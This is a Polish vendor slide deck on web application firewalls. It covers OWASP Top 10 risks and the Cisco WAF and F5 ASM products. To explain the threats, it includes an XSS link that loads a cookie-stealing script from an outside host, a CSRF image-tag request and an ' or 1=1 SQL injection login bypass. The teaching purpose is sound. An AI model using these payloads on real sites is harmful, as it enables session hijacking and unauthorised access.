WAF (Web Application Firewall) Mariusz Sawczuk mariusz.sawczuk@solidex.com.pl niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Ekspansja usług internetowych Coraz więcej usług dostępnych jest przez internet: Klienci, Partnerzy biznesowi, Pracownicy, itd. Coraz więcej urządzeń korzysta z zasobów internetowych: Komórki, PDA, IP phone y, drukarki itp. Istotne kwestie: Aplikacje internetowe mogą być potencjalnym celem ataków Nawet usługi korzystające z protokołu SSL akceptują żądania HTTP bez kontroli 2
Typowa architektura aplikacji internetowej Warstwa Sieci Warstwa Aplikacji Firewall Kod aplikacji napisany przez firmę trzecią Aplikacyjny Serwer Porty 80 i 443 są otwarte Web Serwer Firewall Baza danych (np. MySQL, PostgreSQL) 3
Istota ataku na aplikacje internetowe Warstwa Sieci Warstwa Aplikacji Niefiltrowane dane Firewall Ogromne dziury w aplikacjach Kod aplikacji napisany przez firmę trzecią Aplikacyjny Serwer Porty 80 i 443 są otwarte Web Serwer 75% ataków zdarza się tutaj Firewall Baza danych (np. MySQL, PostgreSQL) Tradycyjne zabezpieczenia sieciowe nie są świadome ataków na aplikacje webowe 4
Dlaczego to takie proste? Sieć z definicji pracuje w innej warstwie i nie jest świadoma aplikacji nie ma magicznych sygnatur na IPSy, reguł na FW, patchy, dla napisanych na indywidualne potrzeby Klienta PHP skryptów Programiści to tylko ludzie: popełniają błędy mają swoje nawyki Internet to relatywnie anonimowe medium Narzędzie służące do ataku: przeglądarka Sieć Oprogramowanie? Dane 5
Dlaczego po prostu nie poprawić błędów w aplikacjach? Każde 1000 linii kodu zawiera średnio 15 krytycznych luk bezpieczeństwa (US Dept of Defense) Średnio, aplikacje biznesowe składają się z 150.000-250.000 linii kodu (Software Magazine) Średnio, diagnoza luki bezpieczeństwa w kodzie zajmuje 75 min, a naprawa 6 godzin (na podstawie pięcioletnich badań Pentagonu) Developerzy skupiają się na rozwoju nowych funkcjonalności a nie usuwaniu błędów Usuwanie luk bezpieczeństwa w aplikacjach jest kosztowne! 6
PCI-DSS 6.5 i 6.6 PCI-DSS (Payment Card Industry Data Security Standard) to standard opisujący koniecznie zabezpieczenia przy transakcjach kartami płatniczymi Jego dwie sekcje: 6.5 i 6.6 koncentrują się na bezpieczeństwie aplikacji internetowych Sekcja 6.6 obliguje do zainstalowania WAF (Web Application Firewalla) do końca czerwca 2008, aby chronić swoje aplikacje przed atakami OWASP top 10 7
Najważniejsze luki w zabezpieczeniach aplikacji Web Lista ataków OWASP - Top 10 (v 2007) OWASP = Open Web App Security Project Cross site scripting (XSS) Injection Flaws Malicious file execution Insecure direct object reference Cross site request forgery (CSRF) Information leakage and improper error handling Broken auth. and session management Insecure cryptographic storage Insecure communication Failure to restrict URL access 8
Najważniejsze luki w zabezpieczeniach aplikacji Web WHID (Web Hacking Incidents Databse) http://www.xiom.com/whid Źródło: WhiteHat Security 9
Atak #0 Unvalidated input (protoplasta wszystkich web ataków) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Atak #0 - Unvalidated input Przyczyna: Efekt: Webowe aplikacje używają parametrów by pobrać informacje od klientów Developerzy skupiają się na poprawnych wartościach parametrów i jak powinny one być przetworzone Zbyt duże zaufanie dla informacji wpisywanych przez klienta w przeglądarce Niewiele uwagi poświęca się nieprawidłowym wartościom parametrów Aplikacja postępuje zgodnie ze 'zmienionymi' informacjami, potencjalnie dając dostęp do kont użytkowników, tajnych danych, itp. Protoplasta dwóch najpopularniejszych ataków (XSS i SQL Injection) Często maskowany za pomocą technik kodowania - http://ha.ckers.org/xss.html Przykład: Manipulowanie parametrami: exploit Shopping Cart Kilka narzędzi do przeglądarek, zaczynając od pluginów, a kończąc na pełnych proxy): Paros, Suru, Burp Suite, WebScarab 11
Atak #0 - Unvalidated input 12
Atak #0 - Unvalidated input - kodowanie W HTML mamy: charsets (zestawy znaków) encoding (kodowanie sposób transformacji znaków na bity) Najpopularniejszy jest kod ASCII (128 znaków). Niestety za jego pomocą nie można przedstawić wszystkich znaków występujących we wszystkich językach świata HTML z tego powodu używa Unicode u (1000 znaków) Rodzaj kodowania może być niezdefiniowany, wówczas może być używane dowolne kodowanie Z kodowaniem Parametr "charset" określa kodowanie znaków, tzn. metodę konwersji sekwencji bajtów na sekwencję znaków. Jeżeli zestaw znaków nie jest zdefiniowany, serwer nie może określić, które znaki są specjalne dla niego. Bez kodowania 13
Atak #0 - Unvalidated input - kodowanie Problem: RFC 1738: Tylko znaki alfanumeryczne [0-9a-zA-Z], znaki specjalne $-_.+!*() oraz znaki zarezerwowane (np. &) mogą być użyte w adresie URL HTML z drugiej strony umożliwia użycie całej palety znaków z Unicodu Normalizacja Polityka Deszyfracja SSL Kanonizacja URL powstrzymuje ataki wykorzystujące kodowanie URLi 14
Atak #1 XSS (Cross-Site Scripting) Wstrzykiwanie kodu PHP, JavaScript do URLa niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Atak #1: XSS (Cross-Site Scripting) Przyczyna: Efekt: User wpisuje dane do aplikacji webowej za pośrednictwem przeglądarki Aplikacja webowa nie sprawdza wpisywanych danych i informacji zwracanych na zapytanie generowane przez użytkownika Niesprawdzone dane zawierają skrypt (np. JavaScript), który jest wykonywany w ramach sesji przeglądarki użytkownika. Celem ataku jest użytkownik, nie aplikacja internetowa! Kradzież tożsamości (kradzież sesji HTTP, export cookie) Kompromitacja bezpieczeństwa przeglądarki kontrola przez hackera Przejęcie pełnej kontroli nad stacją użytkownika Trzy typy ataków XSS: Reflected (Non-Persistent) Stored (Persistent): Hackerzy instalują kod XSS w bazie danych (via a form for instance). Każda wizyta na stronie powoduje wykonanie kodu XSS przykład MySpace.com DOM based (Loacal) 16
Atak #1: XSS (Cross-Site Scripting) Kradzież tożsamości Atakujący http://bock-bock/cgi-bin/power/?q= <script src=http://www.employees.org/~pag/xss/ cookie_theft.js></script> 1) Atakujący wysyła spreparowany link do Ofiary przez Email lub HTTP 4) Skrypt wysyła cookie i informacje o sesji Ofiary (bez jej wiedzy) do Atakującego 5) Atakujący używa skradzionych informacji o sesji by przedstawić się jako Ofiara 2) Ofiara wchodzi na właściwą stronę i jednocześnie wykonywany jest ukryty skrypt 3) Zwracane są dane z procesu autentykacji Ofiara Aplikacja internetowa 17
Atak #1: XSS (Cross-Site Scripting) - Przykład PayPal z szyfrowanym dostępem SSL (2006) i MySpace.com 18
Atak #2 CSRF (Cross-Site Request Forgery) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Atak #2: CSRF (Cross-Site Request Forgery) Opis: Podczas gdy XSS wykorzystuje zaufanie użytkownika na stronie internetowej, to CSRF wykorzystuje zaufanie do witryny sieci Web którą posiada użytkownik przez podrobienie requestu zaufanego użytkownika Występuje pod kilkoma nazwami: Session Riding, XSRF, One-Click Attack, Hostile Linking, Automation Attack Przyczyna: Ofiara loguje się na stronie banku Ofiara w tym samym czasie chatuje i jest zalogowana na blogu Atakujący wpisuje komentarz na blogu zapraszając Ofiarę żeby kliknęła na link. Ofiara nie musi wcale kliknąć na link, wystarczy przecież umieścić obrazek <imgsrc="http://example.org/buy.php?item=ps3&qty=500> Link wykonuje działanie na stronie banku Ofiary Tak długo jak Ofiara jest zalogowana, atak może się powieść 20
Atak #2: CSRF (Cross-Site Request Forgery) Obrona: Nie jest trywialna, nie ma narzędzia typu one-stop-solution Kilka rozwiązań po stronie serwera Wymuszenie autoryzacji tokenami, które nie są automatycznie akceptowane przez przeglądarkę Eliminacja zagrożeń XSS z serwerów aplikacyjnych Używaj analizy obrazkowej (CAPTCHA) Z perspektywy WAFa implementacja sprawdzenia nagłówka zniechęci niektórych hackerów ale nie jest to wystarczające gdy nagłówek może być podspoofowany 21
Atak #3 SQL Injection Wstrzykiwanie zapytań SQL do URLa niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Atak #3: SQL Injection - Przykład Co się stanie jak w pole formularza wpiszemy pojedynczy cudzysłów: ' 23
Atak #3: SQL Injection - Przykład 24
Atak #3: SQL Injection SQL (Structured Query Language) jest standardem umożliwiającym aplikacjom pobieranie informacji z bazy danych. Za pomocą SQL można: wykonywać zapytania do bazy danych pobierać dane z bazy (SELECT) wstawiać nowe rekordy do bazy (INPUT)) usuwać rekordy z bazy (DELETE) aktualizować rekordy w bazie (UPDATE) Typowe zapytanie SQL przy logowaniu: SELECT * FROM users WHERE login = jerry' AND password = '123 Typowy kod w skrypcie, który wykonuje powyższe zapytanie: var sql = "SELECT * FROM users WHERE login = '" + form_user + "' AND password = '" + form_pwd + "'"; 25
Atak #3: SQL Injection Apostrof mały niepozorny znak, z ogromnymi możliwościami Wpisujemy (wstrzykujemy) poniższy kod do formularza za pomocą apostrofu: form_user =' or 1=1 form_pwd = cokolwiek W efekcie wykonując poniższe zapytanie: SELECT * FROM users WHERE login ='' or 1=1 AND password = cokolwiek'... dzięki któremu zalogowaliśmy się do systemu... Komentarz SQL Do ataku można wykorzystywać także znaki ) > \ itd. Zawsze prawda! 26
Omówienie funkcjonalności rozwiązań WAF (Web Application Firewall) na podstawie Cisco WAF niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Cisco WAF Cisco WAF zbudowany na bazie AXG (ACE XML Gateway) - XML firewalla Produkt pojawił się w maju 2008 wraz z softem AXG 6.0 Wydajność appliance a Cisco Inspekcja do 9.000 HTTP na sec, 30.000 jednoczesnych sesji i do 1GB ruchu Sprzedawany jako licencja (również na moduł ACE do cat6500) i jako appliance: 28
Cisco WAF Licencjonowanie, ceny Są licencje na Gateway i na Managera (zarządzanie Cisco WAF Gateway) Jeden Manager może zarządzać kilkoma Cisco WAF Gatewayami Można połączyć funkcjonalność Managera i Gatawya na jednym appliance ie (również na module ACE). Nie jest to wspierane przez support jeszcze. FIPS HW ACE-XML-K9 (FIPS) + ACE-XML-FIPS ACE-XML-NF-K9 + ACE-XML-NONFIPS Non FIPS HW ACE-WAF-GAT-LICFX ACE-WAF-MGT-LICFX Licencje na WAF (oddzielne na gatway i Managera) 29
Cisco WAF modele wdrożeniowe Cisco WAF to Revers Proxy: Sprawdza zapytanie klienta (analizuje pod względem bezpieczeństwa) i jeżeli jest ok., to przekierowuje do właściwego serwera HTTP. Zazwyczaj wymagana jest rekonfiguracja DNS i wskazanie klientom jako adresu IP serwera WWW adresu Cisco WAF Cisco WAF nie posiada wbudowanych mechanizmów zapewniających redundancję. Redundancję można osiągnąć przez: Zewnętrzny Load Balancer: Cisco ACE, F5 BIG-IP SLB (Server Load Balancing): funkcjonalność dostępna na Cisco (routery, switche) z odpowiednim IOS Cisco WAF nie wspiera innego ruchu poza HTTP (HTML, XML). Jeżeli otrzyma ruch typu: SSH, FTP, itp. odrzuci go. To sprawia że bardzo istotne jest aby selektywnie przekierować ruch do WAF. 30
Cisco WAF modele wdrożeniowe Klienci DMZ Data Center Internet Load Balancer (np. ACE, CSS) HTML HTML/XML Chronione aplikacje WWW ACE Web Application Firewall ACE WAF Manager Klienci wysyłają żądanie na adres strony WWW, który jest adresem wirtualnym (VIP) na load balancerach (LB) LB wybiera odpowiedniego WAFa i przekierowuje do niego zapytanie WAF analizuje zapytanie Jeżeli jest ok. to przesyła żądanie na adres innej grupy VIP na LB LB wybiera właściwy serwer WWW i wysyła do niego żądanie 31
Cisco WAF terminologia Chronione aplikacje nazywane są wirtualnymi aplikacjami webowymi Są one grupowane na podstawie dowolnych kryterii (np. aplikacje produkcyjne, testowe etc.) Punkty kontrolne przypisywane są do aplikacji za pomocą profili (pojedyncza aplikacja może mieć przypisany jeden profil. Jeden profil może być skojarzony z wieloma aplikacjami) Parametry związane z inspekcją treści, będącą składową profilu, nazywane są regułami i odnoszą się do sygnatur Cisco WAF domyślnie normalizuje ruch HTTP (do UTF-8) nim przystąpi do inspekcji 32
Cisco WAF - Profile Cisco WAF to nie tylko sygnatury ataków. Dla każdego profilu można kreować politykę w ramach trzech sekcji Sekcja Sekcja aktywnego bezpieczeństwa Zmiana wybranej treści treści w komunikacji pomiędzy klientem i i serwerem Analiza Analiza ruchu ruchu za za pomocą sygnatur 33
Cisco WAF Header Processing Active Security: Header Processing - maskowanie wersji serwera WWW Odpowiedź wysłana w nagłówku HTTP HTTP 34
Cisco WAF Cookie Security Active Security: Cookie Security - podpisywanie i szyfrowanie ciasteczek odbywa się w HARDWARZE Klient CP_EN7a989b1f1b9e966e47d629eec63302d 3571d1677b27fe1bebba48df648b2edc= expires=mon, 15-Dec-2006 1:03:00 GMT; path=/; domain=.cisco.com; secure Po Po zaszyfrowaniu Cisco WAF Web Server sess1=1800; expires=mon, 15-Dec-2006 1:03:00 GMT; path=/; domain=.google.com; secure 35
Cisco WAF Ochrona Overflow, DoS Active Security: Data Overflow Defense ochrona aplikacji przed atakami typu Buffer Overflow, DoS 36
Cisco WAF - DLP Message Rewrite: maskowanie odpowiedzi z serwera jako element DLP maskowanie numerów kart kredytowych) (np. Reguła Reguła użyta użyta to to nadpisania: nadpisania: Operator=rewrite Operator=rewrite SigGroup=CreditCardNN 37
Cisco WAF - DLP Remapowanie komunikatów błędów serwera WWW Z 2 na 5 aplikacji webowych w internecie następuje wyciek informacji Źródło: http://www.whitehatsec.com/home/assets/wpstats032408.pdf Często wynikiem pracy aplikacji, nie potrafiącej dać sobie rady np. z nieprzewidywalnym parametrem jest wyświetlenie danych, które nie powinny być wyświetlane! Remapuj z 500 500 do do200 38
Cisco WAF Message Inspection Message Inspection: Włączenie reguły (sygnatury) anty XSS poziom poziom inspekcji XSS XSS Co Co zrobić zrobić z wykrytym XSS XSS 39
Cisco WAF HaL Większość rozwiązań typu WAF posiada umiejętność dynamicznego uczenia aplikacji, tzw. site learning. WAF dynamicznie buduje profile zachowań i wykorzystania aplikacji, które później będzie chronił Problemy związane z dynamicznym uczeniem: Zajmuje czas, średnio 2-3 tygodnie. W tym czasie nie ma ochrony Po jego wyłączeniu, nie można włączyć go ponownie Jak odizolować czysty ruch od ataków? Żmudne przeglądanie logów Cisco HaL = Cisco Human Assisted Learning HaL nie uczy się aplikacji, tylko pokazuje, które sygnatury wzbudziłyby się gdyby były włączone w trybie blokowania. HaL integruje daje plusy dynamicznego uczenia i usuwa konieczność zgadywania. W event logu można stworzyć wyjątek (modifier) Tworzenie wyjątków to to serce serce HaLa HaLa 40
Cisco WAF We are under attack Natychmiastowe powiadomienie o atakach 41
Cisco WAF We are under attack Dowiedzmy się trochę szczegółów na temat ataku ID ID sygnatury która która się się wzbudziła Nazwa Nazwa wektora ataku ataku 42
Cisco WAF We are under attack Więcej, więcej...szczegółów Pełna Pełna analiza analiza przychodzącego żądania (ataku) (ataku) 43
F5 WAF ASM (Application Security Manager) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
F5 WAF - ASM F5 jest liderem na rynku Load Balancerów Sztandarowy produkt to rodzina urządzeń F5 BIG-IP. Jest to platforma bardzo dobrze dopracowana platforma, na której można uruchomić: Load balancing Kompresję SSL Offloading WAF Firma F5 oferuje dwa rozwiązania typu WAF: ASM (Application Security Manager), który zapewnia pełną ochronę typu WAF PSM (Policy Security Manager) jest okrojoną wersją ASM. Sprawdza zgodność zapytań z RFC. Realizuje więc jedynie ochronę protokołu, a nie aplikacji). ASM daje dwustopniową ochronę Pierwszą linię ochrony stanowią sygnatury Drugą, stanowią zaawansowane metody blokowania wynikające z faktu iż ASM poznał budowę aplikacji (site learning). Na taj podstawie ma opisane wszystkie wartości obiektów i wie jakie parametry mogą przyjmować, więc ich zmiana to będzie atakiem. ASM zabezpiecza przed wszystkimi atakami OWASP top 10 45
F5 WAF ASM: modele wdrożeniowe W odróżnieniu od Cisco (poza modułem ACE do cat6500) rozwiązanie F5 umożliwia uruchomienie funkcji load balansujących i WAF na jednym urządzeniu! Obsługiwana jest oczywiście redundancja Web Serwery Internet Firewall BIG-IP z ASM Management Access (przeglądarka) 46
F5 WAF ASM GUI 47
F5 WAF - ASM Integrated Application Security Live Policy Builder Complete with Staging Environment XML Firewall Validated Application Security Policy Templates OWA, SharePoint, etc Live Signature Update Service Anti-Evasion Engine, etc Predefiniowalne Polityki Integrated Application Intelligence 48
WAF - Podsumowanie niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań
Podsumowanie 50
Podsumowanie WAF to jedyne urządzenie sieciowe, które w logiczny i czytelny sposób potrafi poinformować dział sieciowy/bezpieczeństwa o aplikacjach i atakach na nie! Rozwiązania typu WAF nie zapewnią totalnego bezpieczeństwa ochranianym aplikacjom. Problem leży w aplikacjach i tam błędy powinny być usuwane. Jednakże, załóżmy, że po audycie bezpieczeństwa ujawnionych zostaje 100 błędów. Powiedzmy że WAF jest w stanie zapobiec wykorzystaniu 85 z nich. Zyskujesz czas i możesz skupić się na usunięciu pozostałych 15. Rozwiązania typu WAF są świetnym narzędziem typu Virtual Patchtool dla aplikacji. 51
Dziękuję Mariusz Sawczuk mariusz.sawczuk@solidex.com.pl niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań